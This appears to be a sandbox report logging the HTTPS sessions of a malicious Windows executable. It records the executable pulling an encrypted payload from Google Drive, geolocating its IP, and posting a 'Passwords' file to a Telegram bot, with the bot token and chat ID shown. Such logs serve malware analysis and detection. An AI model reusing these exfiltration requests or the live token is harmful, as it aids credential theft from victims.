                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.849794216.58.206.654435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:05 UTC258OUTGET /download?id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG&export=download HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:08 UTC4954INHTTP/1.1 200 OK
                                                                                                            X-GUploader-UploadID: AFIdbgQW3utg_rqNuyRcAmEq1VaB9I9PHc3it5Hie4PH4zgQHomWyJ_9--vBQKv9idxteovbieM_bnQ
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Security-Policy: sandbox
                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Content-Disposition: attachment; filename="KMlLuYZuLqmfBqiOsydfASFI191.bin"
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 94272
                                                                                                            Last-Modified: Thu, 12 Dec 2024 11:13:02 GMT
                                                                                                            Date: Fri, 10 Jan 2025 20:41:07 GMT
                                                                                                            Expires: Fri, 10 Jan 2025 20:41:07 GMT
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            X-Goog-Hash: crc32c=Zs8rzw==
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close
                                                                                                            2025-01-10 20:41:08 UTC4954INData Raw: 99 49 51 35 a5 be 91 0b ed 40 ae e0 29 1b fd 63 78 94 8e 69 80 49 5a 20 8a 2d a2 4e ad 21 17 b7 19 4b c7 5d ec 88 86 4d 32 27 43 e8 e7 cd f7 d5 b3 d7 3e 25 14 df a5 0c d7 41 ec d7 6e 12 84 1f 10 0c a3 57 6f 73 b9 7a 9e eb f9 50 6e 9e 8a f4 dd 18 56 ab fb b9 7b ec e8 e2 a4 a4 ba 0d 51 e9 50 e9 cb bb be 2d 23 66 e7 d7 de ae f1 51 ff e2 f6 76 61 c9 ab 58 e2 6a dd 0f 3d bd ac e2 ca 7b 97 a5 70 d0 89 fa 0e bf d3 6b 41 6c 43 a0 89 a6 68 fb 81 b9 dd 11 e2 47 2d 00 0a 3c 59 f0 6e 93 67 a1 5f e5 e2 02 b6 4a 71 53 2e aa 47 9c 49 bf 62 66 aa 73 ad 55 ce f0 57 83 d4 05 0a e7 21 83 88 ca 1f 84 6c bd 68 d2 79 0e 30 a1 ba fd d2 be 68 39 ce 1a 0c 04 6f 12 c4 37 c2 6f 54 e8 81 59 22 09 a0 63 a6 1e 10 a5 d0 98 8f a6 66 9f ac ba 9a c0 ea 52 7a 96 4b fe a0 5f bc f5 90 35 b4
                                                                                                            Data Ascii: IQ5@)cxiIZ -N!K]M2'C>%AnWoszPnV{QP-#fQvaXj={pkAlChG-<Yng_JqS.GIbfsUW!lhy0h9o7oTY"cfRzK_5
                                                                                                            2025-01-10 20:41:08 UTC4787INData Raw: 16 14 ba 72 d6 68 0e 22 e0 d9 3b 45 8f 0c 92 fa 3a 2c f3 4f 6d 4f f2 fc b5 21 f0 14 46 31 06 d6 f6 5d a5 a2 3b b1 46 92 3d d7 9a 98 11 28 da ac 61 83 1f 92 c6 94 3c e6 f1 80 74 8f 67 9b 28 e5 45 c8 8e 5b 71 f8 80 f1 2d 31 6c fa fc ca a2 6e 2a c5 21 4f 8d fa 35 f7 6a cd 85 00 b6 28 66 65 95 f3 76 8e 26 47 75 d1 70 0e ef 42 48 cb de c4 91 11 3f 08 fa 57 e6 08 b8 97 c3 7c 17 6a b4 a3 6c 21 2b 03 d3 97 e7 2b 6d ed a6 dd 00 3d 5e 31 ae 34 f7 a2 d0 f1 56 f5 55 0e 5d b4 d5 cd 63 28 2c 16 76 36 e3 35 17 39 7e 99 57 38 6c 42 ad 34 6b 74 a4 3d 79 7a 21 db 12 6e fd 88 04 d1 e8 95 56 a7 1f 11 ac c6 54 dd 69 dc 7a e7 95 07 88 e7 27 34 16 06 3e 9f ef 32 78 1e 5a a6 2a 65 87 ff d9 6d 86 31 c0 60 e6 a4 38 29 e5 b1 e0 e8 cd cc 52 39 99 2d 0b 7c f3 40 aa 37 8d 57 f4 d8 89
                                                                                                            Data Ascii: rh";E:,OmO!F1];F=(a<tg(E[q-1ln*!O5j(fev&GupBH?W|jl!++m=^14VU]c(,v659~W8lB4kt=yz!nVTiz'4>2xZ*em1`8)R9-|@7W
                                                                                                            2025-01-10 20:41:08 UTC1326INData Raw: 64 82 30 e0 5e a1 e2 b2 5a 41 69 a2 ba 26 b6 e8 26 d5 f4 66 3f 65 8a f9 20 28 1b ad 7b 3e 6d 0b f3 26 b7 60 ce 58 5b 7c 63 1b 17 3b f1 48 96 b6 4c 8c c4 99 ec 19 7e 1c 42 f7 00 e3 f6 a3 b7 7d fc b7 77 1f 5e 8a 6d 4d 5c 1b 16 1d 4f ea 9a 8b c8 37 9e 6c 71 07 78 4f 1b 1e 9a d5 eb d2 a3 24 bf 40 0d 9c 1c c7 ee fb c4 e8 bb a2 42 c4 7a 3d 0f 4c 58 c8 fe 00 bc b4 fc fb 95 b6 ef 10 0c a9 dd ed 16 ff cc d0 03 a0 8b c9 f9 07 65 ad 82 bb 2d 41 33 53 c7 d8 7d b1 7e c6 c1 9d 3a bf 95 a3 ec cb 35 08 02 9f 33 ea 80 1e 46 36 06 05 c3 c5 d0 0d 05 9b f8 36 fa 22 3d 98 98 a4 0c d7 65 30 5d 39 31 2b 07 88 2e 0d c2 b1 c8 3f 29 22 54 40 51 4f 1d 06 87 a4 db 6d 89 e7 48 71 be 1f b0 8e 7b c1 2e a3 8f 24 55 27 97 db fc 42 20 64 e5 1b 10 bf 09 66 97 ad 5e 21 ae 40 65 e8 a0 66 45
                                                                                                            Data Ascii: d0^ZAi&&f?e ({>m&`X[|c;HL~B}w^mM\O7lqxO$@Bz=LXe-A3S}~:53F66"=e0]91+.?)"T@QOmHq{.$U'B df^!@efE
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: 39 52 3a 44 ca 61 c5 1c 37 c3 bc 3e ca e2 4e a5 ae 3e e1 42 b0 25 15 c4 dd 71 a7 50 5a c5 f5 2f 41 b6 ae 8d a6 59 cf fd 4d 8c 82 68 07 64 ea 01 2c cc b6 86 92 30 c4 51 c1 74 23 fd 15 a6 29 4a c7 1c d2 07 b4 9e 54 ee cc 23 9e b9 98 eb 5c 3d 0e b1 48 7f 90 29 5b c3 33 9e 0a 69 07 67 8e 32 e0 5e a1 e2 b3 82 9d 63 3e d1 a5 eb e4 26 d1 ed 0b 45 2e 8a f3 24 dc ca 86 79 34 10 6b f2 36 b3 65 da 5a 3d 36 19 8c 13 36 8a 03 96 b6 53 94 1c 99 a6 10 7e 1e 6b 79 69 8f bb d0 6e 79 fe bf 07 48 d3 b5 69 65 8c 3e 00 65 f8 b3 9a fb 6e 12 89 34 97 12 78 2c 89 39 82 3d e9 c4 a3 70 1d 65 05 ee 00 aa a8 8b 66 e0 d1 e2 46 de fd 84 5b 4c 59 e7 e2 78 71 b0 ed f5 cb 81 fb 6b 3a c6 02 e9 3e 26 6e f5 1e de 55 c9 fb 76 5d 40 94 bf 23 7d ec 53 cd fa 8b 94 66 b2 14 9a 29 b0 f6 42 d7 c6
                                                                                                            Data Ascii: 9R:Da7>N>B%qPZ/AYMhd,0Qt#)JT#\=H)[3ig2^c>&E.$y4k6eZ=66S~kyinyHie>en4x,9=pefF[LYxqk:>&nUv]@#}Sf)B
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: a2 8b af f7 93 1d 17 ec a9 86 9e 9d 4c 2e 81 8e 5c 9a b0 22 67 76 b8 8f ea a6 34 d8 42 2e 7e 34 55 c5 37 3d 6e d1 dd af 41 79 c9 48 a2 b3 a6 fb 42 c6 e8 db dc af 57 a5 86 45 88 d0 36 42 ca 7a 9c a8 2d 39 c2 57 8e ec 33 07 14 42 37 26 d4 c8 59 e1 c0 c2 f3 ee 7b 43 8c 12 c9 a8 e8 ef b6 65 14 ad 9c 43 87 19 34 48 30 d0 ef 74 72 1d a5 54 ec 8a 5b b9 c2 33 fc 1b 57 cb 75 9f 2c e5 4a a3 88 6c 13 43 66 0a c2 4f eb 79 06 01 f6 64 44 d0 8b ea 33 11 dd be 62 25 09 6d f5 30 a0 7d d8 71 25 36 74 08 0b 39 9b 10 81 6c 5b be 00 8a f7 2b 48 1c 47 79 78 8a aa b8 26 66 de 84 1b 43 4a 9b 72 f4 92 64 39 19 23 b2 8b 90 5d 28 a3 b8 70 11 86 5d 00 1d 8c 5c f7 c3 bf 13 a2 51 01 a5 e7 bd a8 fb d5 fa d6 ef 53 d0 61 0e ca 64 9c c2 f4 0c bc af fc e1 ab a4 c5 ae 4a a9 d7 c1 70 2c cc
                                                                                                            Data Ascii: L.\"gv4B.~4U7=nAyHBWE6Bz-9W3B7&Y{CeC4H0trT[3Wu,JlCfOydD3b%m0}q%6t9l[+HGyx&fCJrd9#](p]\QSadJp,
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: bd 83 42 5d d6 60 79 5e ce 8c 30 66 75 17 c8 30 17 ab 4e b8 8f 9a dd 3b 5c 48 d2 31 04 aa b0 b8 fc b8 17 14 ec 98 81 b6 61 4c 2c f9 55 4b 8c d3 07 11 9f ba 85 e1 a1 b5 90 4f b4 6c 36 43 e3 bc d3 6e db c1 42 4f 65 ce 4a a9 d0 f3 cd 4b a2 94 34 dc 97 80 b2 50 2a 67 a2 d4 53 d9 1a 93 d5 a6 6d d8 5d f9 ec 87 07 14 42 0c cc c5 d9 4a 81 36 d3 f5 8b 94 51 9d 0a b5 51 c3 ac ad da 68 c0 8d 50 9a eb 19 9e bd 83 fc 7d 62 07 c5 df ff 9f 28 48 cd 22 86 67 bc da 67 84 2b f8 4a bb f4 92 02 4f 40 35 c2 51 92 16 26 d1 fc 73 2b d1 8a f9 2e 6f ca ac 7b 3e 38 2b f3 26 b9 69 d8 5a 20 27 6b 74 93 39 8a 09 85 bb 59 a9 3b 29 32 04 6f 16 32 68 69 9e ba 8f ba 68 f6 c0 1d 52 5e 8b 06 64 8d 1b 1c 17 ee ae 14 e2 d7 ed 89 9c 66 d1 f5 05 2b 1c 9b 5c ec da b8 11 b8 56 14 12 77 a7 72 d3
                                                                                                            Data Ascii: B]`y^0fu0N;\H1aL,UKOl6CnBOeJK4P*gSm]BJ6QQhP}b(H"gg+JO@5Q&s+.o{>8+&iZ 'kt9Y;)2o2hihR^df+\Vwr
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: cc 0d 6b 02 d9 9e 1d ab ba 6f bf 5f 9f 09 05 d7 5f 3e f5 77 76 50 de 2b cb bf 0c f3 19 a6 92 32 54 e2 c9 a1 5e c4 90 bc 47 63 10 94 1c 4e a1 65 b7 85 8c d1 38 a4 4e f8 3b 0f b6 b9 f8 fd aa 16 12 9f 7e 81 b6 76 40 26 f9 c7 4c 8c d3 40 8d 9f ba 89 cc bf 57 1a 4f b4 6b 2d 9e d8 42 c5 7d d6 ef ab 4f 68 c7 51 bd c6 84 89 5e b6 f7 5f 09 af 5d b4 5d 22 76 d7 44 36 c5 6a fd c9 8a 6d d8 51 ed c0 75 16 13 3a b8 2b c5 a9 2f 47 30 c2 f5 f7 6d 40 98 28 35 59 e8 e9 af da 16 b6 a1 13 96 eb 20 9f bd 83 80 70 72 0e bb 2d fa 9e 29 51 ef a7 8c 08 47 c9 6e 9f 31 e7 a5 b1 f4 94 02 49 7a d2 d2 48 f6 f9 2d fd e0 4c ee 2e 8a f3 35 05 a5 f2 7b 34 1a 50 fa 0e 26 65 d8 5c 33 33 63 1b 13 12 aa 03 be 1c 48 a4 1c 91 fd 14 0c 82 5b 79 19 f1 6e a3 b7 7f 91 ea 0c 52 54 a2 d5 65 8d 1d 05
                                                                                                            Data Ascii: ko__>wvP+2T^GcNe8N;~v@&L@WOk-B}OhQ^_]]"vD6jmQu:+/G0m@(5Y pr-)QGn1IzH-L.5{4P&e\33cH[ynRTe
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: 04 88 1e bc 37 4d 89 de 42 e0 48 b7 04 99 4e 02 ad 1c 87 49 7e fe 81 52 e8 e8 fe 9e 6e e4 0e 6a 55 d2 f1 19 c0 bb 65 d0 4a 9e 09 0f bb cb 3e f4 6a 55 5d cf 5e de 41 0d d3 13 b7 89 24 b5 ff f2 72 4f cf b6 d8 4f d4 10 e4 3e 11 a4 0a e2 8f 8c dd 01 55 66 6d 31 04 b7 93 bb fc aa 16 3f cc a9 a9 1c 70 4c 24 83 8c 57 fe 3f 33 5f ef d5 5a ea b7 3e a6 10 b4 6d 30 6c 77 44 d3 68 c2 d2 bc 5f 6c b5 bb a9 c1 86 f7 6a 37 87 30 d6 b9 a3 b1 41 2f 15 32 33 48 a9 7c a5 27 5f 6d d2 41 00 c7 22 14 18 59 28 1b 88 c4 cd ad 30 c2 f2 c1 7e 23 7b 14 a6 29 4a ca ab db a5 9b 95 22 bc d6 23 ee 1f ac f6 65 77 ac 94 58 8d d9 3c 5b b7 91 a9 13 50 df c5 ab 24 81 75 90 e7 ee b1 6b cc 2c d3 51 ee e5 58 de f6 64 40 3f 87 d1 6a 00 ca a7 fb 3b 10 41 f7 26 b3 74 df 4d f6 25 64 0a 14 28 8c 3d
                                                                                                            Data Ascii: 7MBHNI~RnjUeJ>jU]^A$rOO>Ufm1?pL$W?3_Z>m0lwDh_lj70A/23H|'_mA"Y(0~#{)J"#ewX<[P$uk,QXd@?j;A&tM%d(=
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: 8a 9c 34 cb a1 60 f8 76 83 ba e5 e2 74 0c 12 be bb ef cb f3 42 e8 b9 42 7d 37 75 ab 89 06 8f e7 cd f4 42 85 bf 21 19 05 aa 8f b5 4b 13 a9 11 02 3b 98 ec 92 2a 5b c5 c5 d4 ca e9 15 19 79 cd 9e 6d 63 9e 76 ae 4b 3d 2c 1f e1 19 2b f4 1c e4 71 c5 46 cf 1d 29 dc 6b 6d a1 32 3b 5c c9 d9 5e c4 90 dd 6a 00 1f e4 34 04 b0 68 95 c1 8c d7 1a dc 41 f8 31 00 b1 80 af fb bd c0 07 eb b8 86 a7 76 72 ce 75 62 af 8c a3 f1 4f ba 92 bc ea b7 32 da 41 b4 45 68 44 cb 4e 0d 6e d1 fd fd 52 68 c7 59 ac c1 f6 f2 42 b6 87 67 dd af 5d d8 51 2a 67 c0 36 48 d9 2e 8d a6 5e 76 e8 53 fe b8 7c 07 14 7b 24 37 d4 d9 5f 8e 18 1a f3 e4 62 23 ae 23 a6 29 c0 a1 bc d2 0d b4 8d 56 b8 3b 23 9e b7 82 e8 4d 35 0f b1 42 f9 ec fe 5b c7 35 80 00 33 80 7b 8e 48 9c 89 b0 e7 98 35 4b 03 ff d3 5b fb ff fc
                                                                                                            Data Ascii: 4`vtBB}7uB!K;*[ymcvK=,+qF)km2;\^j4hA1vrubO2AEhDNnRhYBg]Q*g6H.^vS|{$7_b##)V;#M5B[53{H5K[
                                                                                                            2025-01-10 20:41:08 UTC1390INData Raw: 57 96 0a 4e b8 3c aa 63 75 58 99 f0 41 c5 fb 17 3a 3d 54 b5 ce 85 52 fc 09 9a c5 38 fa 8a 8d 30 b9 50 65 f8 06 c2 93 64 e2 1e 07 04 40 a8 fe ce 81 e4 ed b9 33 70 2f f0 ab f5 0d 99 19 fd ab 51 98 ae 32 29 60 6f 02 8a 41 61 31 11 14 39 56 b6 92 5a f3 ea d2 db 40 34 0d 6b 5f d3 99 24 87 ba 6f bf 49 ec de 05 93 59 32 fc 1e 1c 48 de 27 a5 6d 0c c0 1f 80 8b 5d 98 fe e1 7f 49 1e 89 c8 71 6d 17 dc 23 01 a1 65 b5 9e 8b a5 78 40 4e 88 5e d1 b1 80 b8 f1 a2 07 13 9e d7 9d b6 00 23 fb 8b 9d 56 9f a7 27 4e 98 c8 13 f6 b7 48 a6 9a b4 6d 3c 57 ce 55 d6 46 42 d7 bc 48 7b cf 48 a4 ed b5 e7 6a b5 86 30 d6 c0 59 b3 50 20 08 d5 37 48 d3 42 19 a6 5f 6b cb 5e ef cd 69 f9 15 5b 2e 26 cf cf be 93 23 c9 e2 ef 44 47 b5 aa a6 59 e2 fe b9 bd 58 be 8d 5a 81 ca 0b 0b bd 89 e9 67 76 0e
                                                                                                            Data Ascii: WN<cuXA:=TR80Ped@3p/Q2)`oAa19VZ@4k_$oIY2H'm]Iqm#ex@N^#V'NHm<WUFBH{Hj0YP 7HB_k^i[.&#DGYXZgv


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.849828104.21.64.14435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:10 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:10 UTC853INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:10 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1856460
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWAxVojSy2EVDuu38ZeVZVWdC9RE8FhQi%2FsVd2krKe5pjUk0w6Bv9gaAe4b500VaMFKUgnlwmKRR6nIlUpG0%2BkdBwe1tsvqoyXqLcPgpp6OeSsCBE3PWKovOoPw2CnSjajWYfPOP"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8fff7c82ece04414-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1671&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1657207&cwnd=180&unsent_bytes=0&cid=030fadca2c4fdff3&ts=162&x=0"
                                                                                                            2025-01-10 20:41:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.849867149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:17 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd318d382f37f4
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 64 33 38 32 66 33 37 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd318d382f37f4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:17 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:17 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:17 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44643,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541677,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.849880149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:19 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31a2245053c6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 32 32 34 35 30 35 33 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31a2245053c6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:19 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:19 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 539
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
